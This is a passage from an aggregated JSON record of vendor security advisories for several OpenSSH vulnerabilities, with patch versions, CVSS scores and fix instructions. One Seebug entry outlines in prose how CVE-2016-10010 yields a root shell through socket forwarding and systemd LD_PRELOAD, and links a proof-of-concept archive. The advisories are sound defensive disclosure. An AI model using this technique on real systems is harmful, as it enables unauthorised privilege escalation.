to 3541.60\n * Upgrade 3468.x versions to 3468.86\n * Upgrade 3445.x versions to 3445.82\n * Upgrade 3421.x versions to 3421.99\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-trusty>).\n * The Cloud Foundry project recommends upgrading the following BOSH xenial-stemcells: \n * Upgrade 170.x versions to 170.6\n * Upgrade 97.x versions to 97.33\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-xenial>).\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.247.0 or later.\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs3 version 0.36.0 or later.\n\n# References\n\n * [USN-3809-1](<https://usn.ubuntu.com/3809-1>)\n * [CVE-2016-10708](<https://people.canonical.com/~ubuntu-security/cve/CVE-2016-10708>)\n * 
[CVE-2018-15473](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-15473>)\n", "edition": 2, "modified": "2018-11-20T00:00:00", "published": "2018-11-20T00:00:00", "id": "CFOUNDRY:AD75AE1BC6EAF1FB6EA7CEC33AAA7C78", "href": "https://www.cloudfoundry.org/blog/usn-3809-1/", "title": "USN-3809-1: OpenSSH vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:44:38", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2017-15906", "CVE-2016-10012"], "description": "Jann Horn discovered that OpenSSH incorrectly loaded PKCS#11 modules from \nuntrusted directories. A remote attacker could possibly use this issue to \nexecute arbitrary PKCS#11 modules. This issue only affected Ubuntu 14.04 \nLTS and Ubuntu 16.04 LTS. (CVE-2016-10009)\n\nJann Horn discovered that OpenSSH incorrectly handled permissions on \nUnix-domain sockets when privilege separation is disabled. A local attacker \ncould possibly use this issue to gain privileges. This issue only affected \nUbuntu 16.04 LTS. (CVE-2016-10010)\n\nJann Horn discovered that OpenSSH incorrectly handled certain buffer memory \noperations. A local attacker could possibly use this issue to obtain \nsensitive information. This issue only affected Ubuntu 14.04 LTS and Ubuntu \n16.04 LTS. (CVE-2016-10011)\n\nGuido Vranken discovered that OpenSSH incorrectly handled certain shared \nmemory manager operations. A local attacker could possibly use this issue to \ngain privileges. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 \nLTS. \n(CVE-2016-10012)\n\nMichal Zalewski discovered that OpenSSH incorrectly prevented write \noperations in readonly mode. A remote attacker could possibly use this \nissue to create zero-length files, leading to a denial of service. 
\n(CVE-2017-15906)", "edition": 5, "modified": "2018-01-22T00:00:00", "published": "2018-01-22T00:00:00", "id": "USN-3538-1", "href": "https://ubuntu.com/security/notices/USN-3538-1", "title": "OpenSSH vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-02T11:40:18", "bulletinFamily": "unix", "cvelist": ["CVE-2018-15473", "CVE-2016-10708"], "description": "Robert Swiecki discovered that OpenSSH incorrectly handled certain messages. \nAn attacker could possibly use this issue to cause a denial of service. \nThis issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. \n(CVE-2016-10708)\n\nIt was discovered that OpenSSH incorrectly handled certain requests. \nAn attacker could possibly use this issue to access sensitive information. \n(CVE-2018-15473)", "edition": 3, "modified": "2018-11-06T00:00:00", "published": "2018-11-06T00:00:00", "id": "USN-3809-1", "href": "https://ubuntu.com/security/notices/USN-3809-1", "title": "OpenSSH vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This package includes the core files necessary for both the OpenSSH client and server. To make this package useful, you should also install openssh-clients, openssh-server, or both. 
", "modified": "2017-01-06T20:25:39", "published": "2017-01-06T20:25:39", "id": "FEDORA:D8A2B60A94E1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: openssh-7.4p1-1.fc25", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:02:27", "description": "No description provided by source.", "published": "2016-12-21T00:00:00", "type": "seebug", "title": "OpenSSH information leak Vulnerability, CVE-2016-10011\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10011"], "modified": "2016-12-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92581", "id": "SSV:92581", "sourceData": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T12:02:26", "description": "No description provided by source.", "published": "2016-12-21T00:00:00", "type": "seebug", "title": "OpenSSH privilege escalation Vulnerability, CVE-2016-10010\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10010"], "modified": "2016-12-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92580", "id": "SSV:92580", "sourceData": "\n Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010\r\n \r\nThis issue affects OpenSSH if privilege separation is disabled (config option\r\nUsePrivilegeSeparation=no). While privilege separation is enabled by default, it\r\nis documented as a hardening option, and therefore disabling it should not\r\ndirectly make a system vulnerable.\r\n \r\nOpenSSH can forward TCP sockets and UNIX domain sockets. If privilege separation\r\nis disabled, then on the server side, the forwarding is handled by a child of\r\nsshd that has root privileges. For TCP server sockets, sshd explicitly checks\r\nwhether an attempt is made to bind to a low port (below IPPORT_RESERVED) and, if\r\nso, requires the client to authenticate as root. 
However, for UNIX domain\r\nsockets, no such security measures are implemented.\r\n \r\nThis means that, using \"ssh -L\", an attacker who is permitted to log in as a\r\nnormal user over SSH can effectively connect to non-abstract unix domain sockets\r\nwith root privileges. On systems that run systemd, this can for example be\r\nexploited by asking systemd to add an LD_PRELOAD environment variable for all\r\nfollowing daemon launches and then asking it to restart cron or so. The attached\r\nexploit demonstrates this - if it is executed on a system with systemd where\r\nthe user is allowed to ssh to his own account and where privsep is disabled, it\r\nyields a root shell.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip\n ", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92580"}, {"lastseen": "2017-11-19T12:02:31", "description": "No description provided by source.", "published": "2016-12-21T00:00:00", "type": "seebug", "title": "OpenSSH authentication security bypass Vulnerability (CVE-2016-10012)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10012"], "modified": "2016-12-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92582", "id": "SSV:92582", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T12:02:26", "description": "On 19 December 2016 a foreign vulnerability platform published details of the latest OpenSSH vulnerability (CVE-2016-10009, remote code execution).**Because the flaw is in ssh-agent, which is not started by default and is typically only used for passwordless (agent-based) logins across multiple hosts, the conditions required to exploit it are relatively strict: the attacker needs control of the forwarded agent socket on a server the victim connects to and the ability to write to the client host's filesystem (see the Red Hat description below). The official severity rating is therefore only \u201cmedium\u201d. 
Users should nevertheless upgrade to the latest version as soon as possible.**\n\nOpenSSH 7.4 was officially released on 19 December 2016. The new version is ported to Linux, BSD and other Unix-like platforms, provides full support for the SSH 2.0 protocol, and fixes bugs and security issues found in previous versions. Note that some of the underlying changes in 7.4 may affect existing configurations.\n\nAccording to results from the cyberspace search engine ZoomEye, about 19,659,712 OpenSSH devices are currently detectable on the Internet; these devices are potential targets for attackers.\n", "published": "2016-12-21T00:00:00", "type": "seebug", "title": "OpenSSH remote code execution vulnerability (CVE-2016-10009)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10009"], "modified": "2016-12-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92579", "id": "SSV:92579", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "centos": [{"lastseen": "2019-12-20T18:28:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "**CentOS Errata and Security Advisory** CESA-2017:2029\n\n\nOpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version: openssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es):\n\n* A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. 
(CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from arbitrary paths. An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process. 
(CVE-2016-10012)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2017-August/004417.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-cavs\nopenssh-clients\nopenssh-keycat\nopenssh-ldap\nopenssh-server\nopenssh-server-sysvinit\npam_ssh_agent_auth\n\n**Upstream details at:**\n", "edition": 6, "modified": "2017-08-24T01:40:16", "published": "2017-08-24T01:40:16", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2017-August/004417.html", "id": "CESA-2017:2029", "title": "openssh, pam_ssh_agent_auth security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-12-11T13:33:23", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10708", "CVE-2016-6210", "CVE-2016-6515"], "description": "OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version: openssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es):\n\n* A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from arbitrary paths. 
An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.", "modified": "2018-04-12T03:33:13", "published": "2017-08-01T09:57:17", "id": "RHSA-2017:2029", "href": "https://access.redhat.com/errata/RHSA-2017:2029", "type": "redhat", "title": "(RHSA-2017:2029) Moderate: openssh security, bug fix, and enhancement update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "aix": [{"lastseen": "2019-05-29T19:19:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10012", "CVE-2016-8858"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued:Sun Feb 5 23:36:10 CST 2017 \n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc\n\nSecurity Bulletin: Vulnerabilities in OpenSSH affect AIX (CVE-2016-8858, \nCVE-2016-10009, CVE-2016-10011, CVE-2016-10012 )\n\n \n 
\n===============================================================================\n\nSUMMARY:\n\nVulnerabilities in OpenSSH affect AIX.\n \n \n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2016-8858\n DESCRIPTION: OpenSSH is vulnerable to a denial of service, caused by an\n error in the kex_input_kexinit() function. By sending specially crafted data\n during the key exchange process, a remote attacker could exploit this\n vulnerability to consume all available memory resources.\n CVSS Base Score: 5.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/118127 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n \n CVEID: CVE-2016-10009\n DESCRIPTION: OpenSSH could allow a remote authenticated attacker to execute\n arbitrary code on the system, caused by the loading of a specially crafted\n PKCS#11 module across a forwarded agent channel. An attacker could exploit \n this vulnerability to write files or execute arbitrary code on the system.\n CVSS Base Score: 6.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119828 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)\n \n CVEID: CVE-2016-10011\n DESCRIPTION:OpenSSH could allow a local authenticated attacker to obtain\n sensitive information, caused by a privilege separation flaw. 
An attacker \n could exploit this vulnerability to obtain host private key material and \n other sensitive information.\n CVSS Base Score: 5.5\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119830 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\n CVEID: CVE-2016-10012\n DESCRIPTION:OpenSSH could allow a local attacker to gain elevated privileges\n on the system, caused by improper bounds checking in the shared memory\n manager. An attacker could exploit this vulnerability to gain elevated \n privileges on the system.\n CVSS Base Score: 5.9\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119831 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n \n AFFECTED PRODUCTS AND VERSION:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n \n The following fileset levels are vulnerable:\n \n key_fileset = osrcaix\n \n Fileset Lower Level Upper Level KEY\n -------------------------------------------------------------\n openssh.base.client 4.0.0.5200 6.0.0.6203 key_w_fs\n openssh.base.server 4.0.0.5200 6.0.0.6203 key_w_fs\n \n Note: To determine if your system is vulnerable, execute the\n following commands:\n\n lslpp -L | grep -i openssh.base.client\n lslpp -L | grep -i openssh.base.server\n\n \n REMEDIATION:\n\n A. FIXES\n\n\tFixes are available. The fixes can be downloaded via ftp and\n\thttp from:\n\n\tftp://aix.software.ibm.com/aix/efixes/security/openssh_fix10.tar\n\thttp://aix.software.ibm.com/aix/efixes/security/openssh_fix10.tar\n\thttps://aix.software.ibm.com/aix/efixes/security/openssh_fix10.tar\n\n\tThe links above are to a tar file containing this signed advisory, interim\n\tfixes, and OpenSSL signatures for each interim fix.\n\tThese fixes below include prerequisite checking. 
This will enforce the correct\n\tmapping between the fixes and AIX releases.\n\n\tNote that the tar file contains Interim fixes that are based on\n\tOpenSSH version as given below. \n\n\tYou must be on the 'prereq for installation' level before applying the interim\n\tfix. This may require installing a new level(prereq version) first.\n \n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n ---------------------------------------------------------------------------------------------\n 5.3, 6.1, 7.1, 7.2 6203_ifix.170124.epkg.Z openssh.base(6.0.0.6203 version) key_w_fix\n\n VIOS Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n ---------------------------------------------------------------------------------------------\n 2.2.* 6203_ifix.170124.epkg.Z openssh.base(6.0.0.6203 version) key_w_fix\n\n\n\tLatest level of OpenSSH fileset is available from the web download site:\n\thttps://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssh&cp=UTF-8\n\n \n\tTo extract the fix from the tar file:\n\n\ttar xvf openssh_fix10.tar\n\tcd openssh_fix10\n\n\tVerify you have retrieved the fix intact:\n\n\tThe checksums below were generated using the\n\t\"openssl dgst -sha256 file\" command is the followng:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 771b1ce548ed725aae3e6b58960d62bfba6b4d77f48ed4b01b1bb1d6acece770 6203_ifix.170124.epkg.Z key_w_csum\n\n \n\tThese sums should match exactly. The OpenSSL signatures in the tar file and\n\ton this advisory can also be used to verify the integrity of the fixes. If \n the sums of the fixes. 
If the sums or signatures cannot be confirmed,\n\tcontact IBM AIX Security at security-alert@austin.ibm.com and describe\n\tthe discrepancy.\n \n\tPublished advisory OpenSSL signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc.sig \n\n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n \n\n \n B. FIX AND INTERIM FIX INSTALLATION\n\n After applying fix, IBM recommends that you regenerate your SSH keys as\n a precaution. \n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n WORKAROUNDS AND MITIGATIONS:\n \n None.\n \n \n===============================================================================\n\nCONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n 
please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n\n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/118127\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/119828\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/119830\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/119831\n CVE-2016-8858 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8858\n CVE-2016-10009: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10009\n CVE-2016-10011: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10011\n CVE-2016-10012: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10012\n \n\nACKNOWLEDGEMENTS:\n\n None\n \n \nCHANGE HISTORY:\n\n First Issued: Sun Feb 5 23:36:10 CST 
2017\n\n\n===============================================================================\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n \n\n\n", "edition": 6, "modified": "2017-02-05T23:36:10", "published": "2017-02-05T23:36:10", "id": "OPENSSH_ADVISORY10.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssh_advisory10.asc", "title": "Vulnerabilities in OpenSSH affect AIX.", "type": "aix", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2020-10-22T17:13:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "[7.4p1-11 + 0.10.3-1]\n- Compiler warnings (#1341754)\n[7.4p1-10 + 0.10.3-1]\n- Add missing messages in FIPS mode (#1341754)\n[7.4p1-9 + 0.10.3-1]\n- Allow harmless syscalls for s390 crypto modules (#1451809)\n[7.4p1-8 + 0.10.3-1]\n- Fix multilib issue in documentation (#1450361)\n[7.4p1-6 + 0.10.3-1]\n- ControlPath too long should not be a fatal error (#1447561)\n[7.4p1-5 + 0.10.3-1]\n- Fix the default key exchange proposal in FIPS mode (#1438414)\n- Remove another wrong coverity chunk to unbreak gsskex (#1438414)\n[7.4p1-4 + 0.10.3-1]\n- Update seccomp filter to 
work on ppc64le (#1443916)\n[7.4p1-3 + 0.10.3-1]\n- Do not completely disable SHA-1 key exchange methods in FIPS (#1324493)\n- Remove wrong coverity patches\n[7.4p1-2 + 0.10.3-1]\n- Fix coverity scan results\n- Adjust FIPS algorithms list (#1420910)\n- Revert problematic feature for chroot(#1418062)\n- Fix CBC weakness in released OpenSSH 7.5\n[7.4p1-1 + 0.10.3-1]\n- Rebase to openssh 7.4 and pam_ssh_agent_auth 0.10.3 (#1341754)\n- detach -cavs subpackage\n- enable seccomp filter for sandboxed child", "edition": 5, "modified": "2017-08-07T00:00:00", "published": "2017-08-07T00:00:00", "id": "ELSA-2017-2029", "href": "http://linux.oracle.com/errata/ELSA-2017-2029.html", "title": "openssh security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "**Issue Overview:**\n\nA covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. ([CVE-2016-6210 __](<https://access.redhat.com/security/cve/CVE-2016-6210>))\n\nIt was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords. ([CVE-2016-6515 __](<https://access.redhat.com/security/cve/CVE-2016-6515>))\n\nIt was found that ssh-agent could load PKCS#11 modules from arbitrary paths. An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent. 
([CVE-2016-10009 __](<https://access.redhat.com/security/cve/CVE-2016-10009>))\n\nIt was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information. ([CVE-2016-10011 __](<https://access.redhat.com/security/cve/CVE-2016-10011>))\n\nIt was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process. ([CVE-2016-10012 __](<https://access.redhat.com/security/cve/CVE-2016-10012>))\n\n \n**Affected Packages:** \n\n\nopenssh\n\n \n**Issue Correction:** \nRun _yum update openssh_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n openssh-ldap-7.4p1-11.68.amzn1.i686 \n pam_ssh_agent_auth-0.10.3-1.11.68.amzn1.i686 \n openssh-cavs-7.4p1-11.68.amzn1.i686 \n openssh-7.4p1-11.68.amzn1.i686 \n openssh-debuginfo-7.4p1-11.68.amzn1.i686 \n openssh-keycat-7.4p1-11.68.amzn1.i686 \n openssh-server-7.4p1-11.68.amzn1.i686 \n openssh-clients-7.4p1-11.68.amzn1.i686 \n \n src: \n openssh-7.4p1-11.68.amzn1.src \n \n x86_64: \n openssh-ldap-7.4p1-11.68.amzn1.x86_64 \n openssh-server-7.4p1-11.68.amzn1.x86_64 \n openssh-7.4p1-11.68.amzn1.x86_64 \n openssh-keycat-7.4p1-11.68.amzn1.x86_64 \n pam_ssh_agent_auth-0.10.3-1.11.68.amzn1.x86_64 \n openssh-cavs-7.4p1-11.68.amzn1.x86_64 \n openssh-debuginfo-7.4p1-11.68.amzn1.x86_64 \n openssh-clients-7.4p1-11.68.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2017-10-03T11:00:00", "published": "2017-10-03T11:00:00", "id": "ALAS-2017-898", "href": "https://alas.aws.amazon.com/ALAS-2017-898.html", "title": "Medium: openssh", "type": "amazon", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": 
[{"lastseen": "2019-05-29T18:32:23", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10010"], "description": "\nProblem Description:\nThe ssh-agent(1) agent supports loading a PKCS#11 module\n\tfrom outside a trusted whitelist. An attacker can request\n\tloading of a PKCS#11 module across forwarded agent-socket.\n\t[CVE-2016-10009]\nWhen privilege separation is disabled, forwarded Unix\n\tdomain sockets would be created by sshd(8) with the privileges\n\tof 'root' instead of the authenticated user. [CVE-2016-10010]\nImpact:\nA remote attacker who have control of a forwarded\n\tagent-socket on a remote system and have the ability to\n\twrite files on the system running ssh-agent(1) agent can\n\trun arbitrary code under the same user credential. Because\n\tthe attacker must already have some control on both systems,\n\tit is relatively hard to exploit this vulnerability in a\n\tpractical attack. [CVE-2016-10009]\nWhen privilege separation is disabled (on FreeBSD,\n\tprivilege separation is enabled by default and has to be\n\texplicitly disabled), an authenticated attacker can potentially\n\tgain root privileges on systems running OpenSSH server.\n\t[CVE-2016-10010]\n", "edition": 7, "modified": "2017-01-13T00:00:00", "published": "2017-01-11T00:00:00", "id": "2C948527-D823-11E6-9171-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/2c948527-d823-11e6-9171-14dae9d210b8.html", "title": "FreeBSD -- OpenSSH multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-01-09T22:01:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10010"], "edition": 2, "description": "\nThe OpenSSH project reports:\n\n\nssh-agent(1): Will now refuse to load PKCS#11 modules from\n\t paths outside a trusted whitelist (run-time configurable).\n\t Requests to load modules could be passed via agent forwarding\n\t and an attacker could attempt to load a hostile PKCS#11 module\n\t 
